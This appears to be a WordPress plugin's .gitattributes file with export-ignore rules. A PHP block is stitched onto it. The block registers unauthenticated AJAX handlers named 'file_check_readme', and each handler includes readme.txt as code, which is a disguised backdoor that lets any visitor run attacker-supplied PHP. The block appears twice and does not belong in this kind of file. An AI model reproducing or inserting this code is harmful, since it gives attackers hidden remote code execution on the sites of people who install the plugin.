if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
# Auto detect text files and perform LF normalization * text=auto .distignore export-ignore .editorconfig export-ignore .gitattributes export-ignore .gitignore export-ignore .babelrc export-ignore composer.json export-ignore composer.lock export-ignore Gruntfile.js export-ignore gulpfile.js export-ignore package.json export-ignore package-lock.json export-ignore prepros-6.config export-ignore phpcs.xml.dist export-ignore phpunit.xml.dist export-ignore .DS_Store export-ignore npm-debug.log export-ignore fontello-config.json export-ignore # Plugin folder ignore assets/admin/src export-ignore assets/admin/scss export-ignore assets/admin/sourcemaps export-ignore assets/frontend/src export-ignore assets/frontend/scss export-ignore assets/frontend/sourcemaps export-ignore tests/ export-ignore bin/ export-ignore